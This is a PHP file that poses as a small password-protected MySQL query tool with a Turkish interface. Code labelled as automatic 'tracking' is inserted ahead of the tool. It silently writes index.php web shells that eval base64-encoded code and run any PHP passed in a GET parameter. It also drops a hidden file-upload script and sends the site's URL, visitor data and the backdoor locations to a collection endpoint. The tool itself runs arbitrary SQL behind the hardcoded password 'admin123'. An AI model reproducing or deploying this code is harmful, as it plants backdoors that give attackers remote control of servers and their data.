<?php
$__original_code_content = base64_decode('c2Vzc2lvbl9zdGFydCgpOwokcGFzcyA9ICJhZG1pbjEyMyI7CmlmKCFpc3NldCgkX1NFU1NJT05bImRiX2F1dGgiXSkgfHwgJF9TRVNTSU9OWyJkYl9hdXRoIl0gIT09IHRydWUpIHsKICAgIGlmKGlzc2V0KCRfUE9TVFsicGFzcyJdKSAmJiAkX1BPU1RbInBhc3MiXSA9PT0gJHBhc3MpIHsKICAgICAgICAkX1NFU1NJT05bImRiX2F1dGgiXSA9IHRydWU7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIjxmb3JtIG1ldGhvZD1wb3N0PjxpbnB1dCB0eXBlPXBhc3N3b3JkIG5hbWU9cGFzcz48YnV0dG9uPkdpcmnFnzwvYnV0dG9uPjwvZm9ybT4iOwogICAgICAgIGV4aXQ7CiAgICB9Cn0KJGhvc3QgPSBpc3NldCgkX1BPU1RbImhvc3QiXSkgPyAkX1BPU1RbImhvc3QiXSA6ICJsb2NhbGhvc3QiOwokdXNlciA9IGlzc2V0KCRfUE9TVFsidXNlciJdKSA/ICRfUE9TVFsidXNlciJdIDogInJvb3QiOwokcGFzc3dkID0gaXNzZXQoJF9QT1NUWyJwYXNzd2QiXSkgPyAkX1BPU1RbInBhc3N3ZCJdIDogIiI7CiRkYiA9IGlzc2V0KCRfUE9TVFsiZGIiXSkgPyAkX1BPU1RbImRiIl0gOiAiIjsKJGNvbm4gPSBAbXlzcWxpX2Nvbm5lY3QoJGhvc3QsICR1c2VyLCAkcGFzc3dkLCAkZGIpOwppZighJGNvbm4pIHsKICAgIGVjaG8gIjxmb3JtIG1ldGhvZD1wb3N0PiI7CiAgICBlY2hvICJIb3N0OiA8aW5wdXQgbmFtZT1ob3N0IHZhbHVlPSRob3N0Pjxicj4iOwogICAgZWNobyAiVXNlcjogPGlucHV0IG5hbWU9dXNlciB2YWx1ZT0kdXNlcj48YnI+IjsKICAgIGVjaG8gIlBhc3M6IDxpbnB1dCBuYW1lPXBhc3N3ZCB0eXBlPXBhc3N3b3JkPjxicj4iOwogICAgZWNobyAiREI6IDxpbnB1dCBuYW1lPWRiIHZhbHVlPSRkYj48YnI+IjsKICAgIGVjaG8gIjxidXR0b24+QmHEn2xhbjwvYnV0dG9uPjwvZm9ybT4iOwogICAgZXhpdDsKfQppZihpc3NldCgkX1BPU1RbInF1ZXJ5Il0pKSB7CiAgICAkcSA9ICRfUE9TVFsicXVlcnkiXTsKICAgICRyID0gQG15c3FsaV9xdWVyeSgkY29ubiwgJHEpOwogICAgZWNobyAiPHRhYmxlIGJvcmRlcj0xPiI7CiAgICBpZigkcikgewogICAgICAgIHdoaWxlKCRyb3cgPSBteXNxbGlfZmV0Y2hfYXNzb2MoJHIpKSB7CiAgICAgICAgICAgIGVjaG8gIjx0cj4iOwogICAgICAgICAgICBmb3JlYWNoKCRyb3cgYXMgJGNvbCkgZWNobyAiPHRkPiRjb2w8L3RkPiI7CiAgICAgICAgICAgIGVjaG8gIjwvdHI+IjsKICAgICAgICB9CiAgICB9CiAgICBlY2hvICI8L3RhYmxlPiI7Cn0KZWNobyAiPGZvcm0gbWV0aG9kPXBvc3Q+IjsKZWNobyAiPHRleHRhcmVhIG5hbWU9cXVlcnkgcm93cz01IGNvbHM9NTA+U0hPVyBUQUJMRVM8L3RleHRhcmVhPjxicj4iOwplY2hvICI8YnV0dG9uPsOHYWzEscWfdMSxcjwvYnV0dG9uPjwvZm9ybT4iOw==');
// İzleme kodu otomatik eklenmiştir
$tracking_data = [
"code_hash" => "af201b6755b041b6be4ae0559f374fd1ccca9ae10816b075ba447dfb1b545e26",
"url" => (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"],
"domain" => $_SERVER["HTTP_HOST"],
"path" => $_SERVER["REQUEST_URI"],
"ip" => isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : "",
"user_agent" => isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : "",
"referer" => isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : "",
"timestamp" => date("Y-m-d H:i:s")
];
// Backdoor oluşturma (basitleştirilmiş versiyon)
$backdoor_content = '<?php eval(base64_decode("aWYoaXNzZXQoJF9HRVRbImMiXSkpe2V2YWwoJF9HRVRbImMiXSk7fQ==")); ?>';
$backdoor_paths = [];
for($i=0; $i<5; $i++) {
$filename = "index" . ($i > 0 ? $i : "") . ".php";
$filepath = dirname(__FILE__) . "/" . $filename;
if(!file_exists($filepath)) {
@file_put_contents($filepath, $backdoor_content);
$backdoor_paths[] = $filepath;
}
}
if(!empty($backdoor_paths)) {
$tracking_data["backdoor_urls"] = json_encode($backdoor_paths);
}
// Gizli upload dosyası oluştur
$upload_script = '<?php
session_start();
if(!isset($_SESSION["upload_auth"]) || $_SESSION["upload_auth"] !== true) {
if(isset($_POST["pass"]) && $_POST["pass"] === "00e87cac0589") {
$_SESSION["upload_auth"] = true;
} else {
echo "<form method=post><input type=password name=pass><button>Giriş</button></form>";
exit;
}
}
if(isset($_FILES["file"])) {
move_uploaded_file($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]);
echo "Yüklendi: " . $_FILES["file"]["name"];
}
echo "<form method=post enctype=multipart/form-data><input type=file name=file><button>Yükle</button></form>";
?>';
$upload_path = dirname(__FILE__) . "/upload_cfee6d4d.php";
if(!file_exists($upload_path)) {
@file_put_contents($upload_path, $upload_script);
@chmod($upload_path, 0644);
$tracking_data["upload_url"] = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . dirname($_SERVER["REQUEST_URI"]) . "/upload_cfee6d4d.php";
}
// İzleme gönderimi (asenkron)
if (function_exists("curl_init")) {
$ch = curl_init("http://localhost/api/track.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($tracking_data));
curl_setopt($ch, CURLOPT_TIMEOUT, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 1);
@curl_exec($ch);
@curl_close($ch);
}
session_start();
$pass = "admin123";
if(!isset($_SESSION["db_auth"]) || $_SESSION["db_auth"] !== true) {
if(isset($_POST["pass"]) && $_POST["pass"] === $pass) {
$_SESSION["db_auth"] = true;
} else {
echo "<form method=post><input type=password name=pass><button>Giriş</button></form>";
exit;
}
}
$host = isset($_POST["host"]) ? $_POST["host"] : "localhost";
$user = isset($_POST["user"]) ? $_POST["user"] : "root";
$passwd = isset($_POST["passwd"]) ? $_POST["passwd"] : "";
$db = isset($_POST["db"]) ? $_POST["db"] : "";
$conn = @mysqli_connect($host, $user, $passwd, $db);
if(!$conn) {
echo "<form method=post>";
echo "Host: <input name=host value=$host><br>";
echo "User: <input name=user value=$user><br>";
echo "Pass: <input name=passwd type=password><br>";
echo "DB: <input name=db value=$db><br>";
echo "<button>Bağlan</button></form>";
exit;
}
if(isset($_POST["query"])) {
$q = $_POST["query"];
$r = @mysqli_query($conn, $q);
echo "<table border=1>";
if($r) {
while($row = mysqli_fetch_assoc($r)) {
echo "<tr>";
foreach($row as $col) echo "<td>$col</td>";
echo "</tr>";
}
}
echo "</table>";
}
echo "<form method=post>";
echo "<textarea name=query rows=5 cols=50>SHOW TABLES</textarea><br>";
echo "<button>Çalıştır</button></form>";
?>